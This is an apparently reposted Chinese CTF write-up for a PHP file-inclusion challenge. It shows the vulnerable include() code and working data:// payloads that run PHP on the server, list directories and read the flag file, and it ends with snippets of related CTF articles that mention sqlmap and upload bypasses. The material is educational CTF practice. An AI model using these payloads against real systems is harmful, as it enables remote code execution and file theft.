WEB:Web_php_include(多解)

这篇具有很好参考价值的文章主要介绍了WEB:Web_php_include(多解)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

背景知识

文件包含

file://协议

php://协议

data://协议

了解strstr函数

题目

WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档
WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档
<?php
show_source(__FILE__);
echo $_GET['hello']; /*可以构造payload*/
$page=$_GET['page'];
while (strstr($page, "php://")) {   /*strstr()函数*/
    $page=str_replace("php://", "", $page); /*page参数中带有php://的都会被替换成空*/
}
include($page);
?>

由于file://协议用于本地系统,所以考虑用data://协议

先进行测试

/?page=data://text/plain,<?php phpinfo()?>  /*可以使用base64防止乱码问题*/
WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档

再利用,可得到目录路径

/?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']; ?>
WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档

再利用,可得到当前目录文件

/?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>
WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档

看到fl4g文件,再用 file_get_contents 就可以读取里面的内容

/?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

得到flag

WEB:Web_php_include(多解),攻防世界,前端,php,网络安全,Powered by 金山文档

其他解法待更新

参考文章链接:

https://blog.csdn.net/weixin_43818995/article/details/104164700

https://blog.csdn.net/weixin_63810302/article/details/125383740

https://blog.csdn.net/yingyugo/article/details/109783035

https://blog.csdn.net/2301_77300311/article/details/130487360文章来源地址https://www.toymoban.com/news/detail-574393.html

到了这里,关于WEB:Web_php_include(多解)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 攻防世界easyupload (web新手)

    典型的文件上传,本题涉及知识点 文件上传漏洞 .user.ini绕过 其实这个题目是文件上传漏洞中相对来说不是很常见的题目,说实话也是涉及了我的知识盲区,在此之前我对文件上传漏洞有一些总结如下,都尝试过后发现没有能用的。 1. JavaScript 防御 检测发生在浏览器端(本地

    2023年04月16日
    浏览(43)
  • 攻防世界web题目记录(一)

    打开后获得源码开始审计 第一个php便是重定向到page页面 第二个是上传文件并保存但是首先需要session为admin 接着看第三个是要利用php弱类型 如果设置了id 并且id的浮点值不等于1并且截取id的最后一个值等于9这里可以使用php弱类型1-9绕过 接着上传文件,这里主要是包括有一个目

    2024年02月07日
    浏览(44)
  • 攻防世界-web-easytornado

    题目描述:Tornado 框架。打开链接是一个简单的界面 1. 思路分析 看到有个/flag.txt,我们点击进去看下 发现传入了两个参数,一个是filename,还有一个是filehash 看到里面的内容,提示我们真正的flag在 /fllllllllllllag中 因此,读取到 /fllllllllllllag就可以获取到真正的flag了,但是我

    2024年02月16日
    浏览(38)
  • 攻防世界-WEB-easyupload

    1.新建.user.ini文件,内容如下 GIF89a auto_prepend_file=a.jpg 2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为 Content-Type: image/jpg 3.放包,结果如下 4. 新建a.txt文件,内容为 GIF89a ?=eval($_REQUEST[\\\'cmd\\\']);? 保存后将文件后缀修改为.jpg 5.直接上传该文件即可成功上传 PS:按

    2024年02月09日
    浏览(37)
  • Web安全攻防世界06 easyupload

    这道题我挣扎了很久,还是没有解出来,详细 错误 解题思路可以参考另一篇博文~(#_-) CTF 总结01:文件上传绕过_梅头脑_的博客-CSDN博客 ↑博文很啰嗦地讲述了我用蚁剑连接一句话木马花式写法的各种失败姿势,面对文件上传一步一个坑的绝望心态,欢迎同伴围观、吐槽和指

    2024年02月07日
    浏览(42)
  • 攻防世界-WEB-NewsCenter

    打开环境 有查询,猜测是sql注入 保存请求头到文件中 准备利用sqlmap 查找数据库 python sqlmap.py -r ./ 123.txt --dbs 查找表 python sqlmap.py -r ./1 23.txt --tables -D news 查找字段 python sqlmap.py -r ./ 123.txt --column -D news -T secret_table 显示字段信息 python sqlmap.py -r ./ 123.txt --dump -D news -T secret_table

    2024年02月09日
    浏览(37)
  • 攻防世界-WEB-ics-05

    打开靶机 只有设备维护中心可以点开 点标签得到新的url page=index 想到文件包含漏洞(URL中出现path、dir、file、pag、page、archive、p、eng、语言文件等相关眼 利用php伪协议查看源码  出现一段base64源码,进行转码得出源码 ?page=php://filter/read=convert.base64-encode/resource=index.ph

    2024年02月09日
    浏览(42)
  • 【攻防世界-Web】unserialize3解题思路

    本题需要利用反序列化字符串来进行解题,根据源码提示我们需要构造code。 而__wakeup()在PHP中被称为魔术方法,在进行反序列化时,unserialize()会检查是否存在__wakeup(),若存在,该__wakeup()魔术方法会被先一步调用。对于本题,如果我们直接进行序列化,则会执行__wakeup()从而导

    2024年02月08日
    浏览(42)
  • 攻防世界-web-simple js

    题目描述:小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 打开链接: 然后我们会发现不管我们输入什么密码,发现是都是这样的报错  1. 先用bp抓包看看 ,可以抓到这样的一串js脚本 看不懂没关系,我们试着将这串代码拷贝下来,运行下,将最后

    2024年02月03日
    浏览(38)
  • CTF-攻防世界web新手入门篇

    攻防世界网址 https://adworld.xctf.org.cn 新手篇虽然非常简单,但是对于小白来说这种最常见的常识或者思路可能不熟悉,所以在这里给大家分享一下最不起眼的小常识或者小技巧。 1、view_source 访问题目场景,如下图 鼠标右击不能用,但是F12也可以看源码,发现有个脚本是实现

    2024年02月06日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包